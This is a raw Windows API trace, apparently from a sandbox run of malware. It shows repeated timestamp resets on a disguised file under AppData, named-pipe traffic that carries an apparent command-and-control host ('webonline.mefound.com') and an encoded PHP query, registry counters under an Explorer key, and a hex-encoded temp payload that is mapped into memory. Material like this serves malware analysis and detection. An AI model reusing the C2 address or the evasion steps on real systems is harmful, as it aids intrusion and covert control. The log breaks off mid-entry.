[0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0110.289] GetFileType (hFile=0x1b4) returned 0x1 [0110.289] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0xf2195b0, dwHighDateTime=0x1d3dfbb)) [0110.289] GetLastError () returned 0xb7 [0110.289] SetLastError (dwErrCode=0xb7) [0110.289] GetLastError () returned 0xb7 [0110.289] SetLastError (dwErrCode=0xb7) [0110.289] GetLastError () returned 0xb7 [0110.289] SetLastError (dwErrCode=0xb7) [0110.289] CloseHandle (hObject=0x1b4) returned 1 [0110.289] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0110.289] SetFileTime (hFile=0x1b4, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0110.290] CloseHandle (hObject=0x1b4) returned 1 [0110.290] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0110.290] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1b8 [0110.290] SetNamedPipeHandleState (hNamedPipe=0x1b4, lpMode=0x172e524, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0110.290] GetTickCount () returned 0x2a237 [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2ac, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0110.291] GetFileType (hFile=0x1bc) returned 0x1 [0110.291] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3d8 | out: lpSystemTimeAsFileTime=0x172c3d8*(dwLowDateTime=0xf2195b0, dwHighDateTime=0x1d3dfbb)) [0110.291] GetLastError () returned 0xb7 [0110.291] SetLastError (dwErrCode=0xb7) [0110.291] GetLastError () returned 0xb7 [0110.291] SetLastError (dwErrCode=0xb7) [0110.291] GetLastError () returned 0xb7 [0110.291] SetLastError (dwErrCode=0xb7) [0110.291] CloseHandle (hObject=0x1bc) returned 1 [0110.291] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0110.291] SetFileTime (hFile=0x1bc, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0110.291] CloseHandle (hObject=0x1bc) returned 1 [0110.291] strlen (_Str="webonline.mefound.com") returned 0x15 [0110.291] strlen (_Str="index/index.php?h=OjoH51%2feH88%3d&d=OjoCBOTAiM86OwjWaegu%2bgIIMtBv7S%2f7CgoH51%2feH886OgfnX95%3d") returned 0x61 [0110.291] WriteFile (in: hFile=0x1b4, lpBuffer=0x31ff50*, nNumberOfBytesToWrite=0x8c, lpNumberOfBytesWritten=0x172e4f8, lpOverlapped=0x311230 | out: lpBuffer=0x31ff50*, lpNumberOfBytesWritten=0x172e4f8*=0x8c, lpOverlapped=0x311230) returned 1 [0110.292] ReadFile (in: hFile=0x1b4, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0xd, lpOverlapped=0x311230) returned 1 [0112.234] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x7a120) returned 0x0 [0112.234] GetOverlappedResult (in: hFile=0x1b4, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0112.234] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0112.234] GetFileType (hFile=0xd8) returned 0x1 [0112.235] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0x104b2190, dwHighDateTime=0x1d3dfbb)) [0112.235] GetLastError () returned 0xb7 [0112.235] SetLastError (dwErrCode=0xb7) [0112.235] GetLastError () returned 0xb7 [0112.235] SetLastError (dwErrCode=0xb7) [0112.235] GetLastError () returned 0xb7 [0112.235] SetLastError (dwErrCode=0xb7) [0112.236] CloseHandle (hObject=0xd8) returned 1 [0112.236] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0112.236] SetFileTime (hFile=0xd8, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.236] CloseHandle (hObject=0xd8) returned 1 [0112.236] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0xd8, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0112.236] RegSetValueExA (in: hKey=0xd8, lpValueName="FGcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0112.236] RegCloseKey (hKey=0xd8) returned 0x0 [0112.236] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0xd8, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0112.236] RegQueryValueExA (in: hKey=0xd8, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0112.237] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.237] GetFileType (hFile=0x114) returned 0x1 [0112.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x104b2190, dwHighDateTime=0x1d3dfbb)) [0112.237] GetLastError () returned 0xb7 [0112.237] SetLastError (dwErrCode=0xb7) [0112.237] GetLastError () returned 0xb7 [0112.237] SetLastError (dwErrCode=0xb7) [0112.237] GetLastError () returned 0xb7 [0112.237] SetLastError (dwErrCode=0xb7) [0112.237] CloseHandle (hObject=0x114) returned 1 [0112.237] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.237] SetFileTime (hFile=0x114, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.237] CloseHandle (hObject=0x114) returned 1 [0112.237] CloseHandle (hObject=0x1b4) returned 1 [0112.237] CloseHandle (hObject=0x1b8) returned 1 [0112.237] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0xea60) returned 0x0 [0112.237] GetLastError () returned 0x0 [0112.237] wsprintfA (in: param_1=0x172ebbc, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0112.237] wsprintfA (in: param_1=0x172e974, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\78f5d1ae4590aa11.tmp") returned 57 [0112.237] lstrlenA (lpString="olestdmp.ocx") returned 12 [0112.237] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x172e974 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0112.237] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpString2="\\" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" [0112.238] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned 37 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6C") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned 39 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F", lpString2="6C" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="65") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned 41 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C", lpString2="65" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="73") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned 43 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65", lpString2="73" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="74") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned 45 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573", lpString2="74" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="64") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned 47 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374", lpString2="64" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6D") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned 49 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464", lpString2="6D" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="70") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned 51 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D", lpString2="70" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="2E") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned 53 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70", lpString2="2E" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned 55 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="63") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned 57 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F", lpString2="63" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63" [0112.238] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="78") returned 2 [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned 59 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63", lpString2="78" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378" [0112.238] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned 61 [0112.238] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378", lpString2="FF.tmp" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" [0112.238] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0x35ac20 [0112.238] FindClose (in: hFindFile=0x35ac20 | out: hFindFile=0x35ac20) returned 1 [0112.239] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0112.239] wsprintfA (in: param_1=0x172e838, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0112.239] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0112.239] GetFileSize (in: hFile=0x1b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa4 [0112.239] CloseHandle (hObject=0x1b8) returned 1 [0112.239] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0x35ac20 [0112.239] FindClose (in: hFindFile=0x35ac20 | out: hFindFile=0x35ac20) returned 1 [0112.239] GetLocalTime (in: lpSystemTime=0x172e7b4 | out: lpSystemTime=0x172e7b4*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xb, wMinute=0x7, wSecond=0x2c, wMilliseconds=0x38f)) [0112.239] GetLastError () returned 0x0 [0112.239] SetLastError (dwErrCode=0x0) [0112.239] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x1b8, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0112.239] RegQueryValueExA (in: hKey=0x1b8, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x5c) returned 0x0 [0112.239] RegQueryValueExA (in: hKey=0x1b8, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x302e38, lpcbData=0x172e544*=0x5c | out: lpType=0x0, lpData=0x302e38*=0x9a, lpcbData=0x172e544*=0x5c) returned 0x0 [0112.239] RegCloseKey (hKey=0x1b8) returned 0x0 [0112.239] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x1b8, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0112.239] RegQueryValueExA (in: hKey=0x1b8, lpValueName="Pdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0x0, lpcbData=0x172e548*=0x4) returned 0x0 [0112.239] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x1b4, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0112.239] RegQueryValueExA (in: hKey=0x1b4, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0112.239] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e514 | out: phkResult=0x72f1ed90*=0x114, lpdwDisposition=0x172e514*=0x2) returned 0x0 [0112.239] RegSetValueExA (in: hKey=0x114, lpValueName="Pdx", Reserved=0x0, dwType=0x4, lpData=0x172e548*=0x0, cbData=0x4 | out: lpData=0x172e548*=0x0) returned 0x0 [0112.240] RegCloseKey (hKey=0x114) returned 0x0 [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.240] GetLastError () returned 0x0 [0112.240] SetLastError (dwErrCode=0x0) [0112.241] GetLastError () returned 0x0 [0112.241] SetLastError (dwErrCode=0x0) [0112.241] GetLastError () returned 0x0 [0112.241] SetLastError (dwErrCode=0x0) [0112.241] GetLastError () returned 0x0 [0112.241] SetLastError (dwErrCode=0x0) [0112.241] GetLastError () returned 0x0 [0112.241] SetLastError (dwErrCode=0x0) [0112.241] GetLastError () returned 0x0 [0112.241] SetLastError (dwErrCode=0x0) [0112.241] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.241] GetFileType (hFile=0x114) returned 0x1 [0112.241] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0x104d82f0, dwHighDateTime=0x1d3dfbb)) [0112.241] GetLastError () returned 0xb7 [0112.241] SetLastError (dwErrCode=0xb7) [0112.241] GetLastError () returned 0xb7 [0112.241] SetLastError (dwErrCode=0xb7) [0112.241] GetLastError () returned 0xb7 [0112.241] SetLastError (dwErrCode=0xb7) [0112.241] CloseHandle (hObject=0x114) returned 1 [0112.242] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.242] SetFileTime (hFile=0x114, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.242] CloseHandle (hObject=0x114) returned 1 [0112.242] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.242] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa4 [0112.242] CreateFileMappingA (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1c4 [0112.242] MapViewOfFile (hFileMappingObject=0x1c4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c0000 [0112.243] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0xea60) returned 0x0 [0112.243] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0112.243] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1cc [0112.243] SetNamedPipeHandleState (hNamedPipe=0x1c8, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0112.243] GetTickCount () returned 0x2a9e5 [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 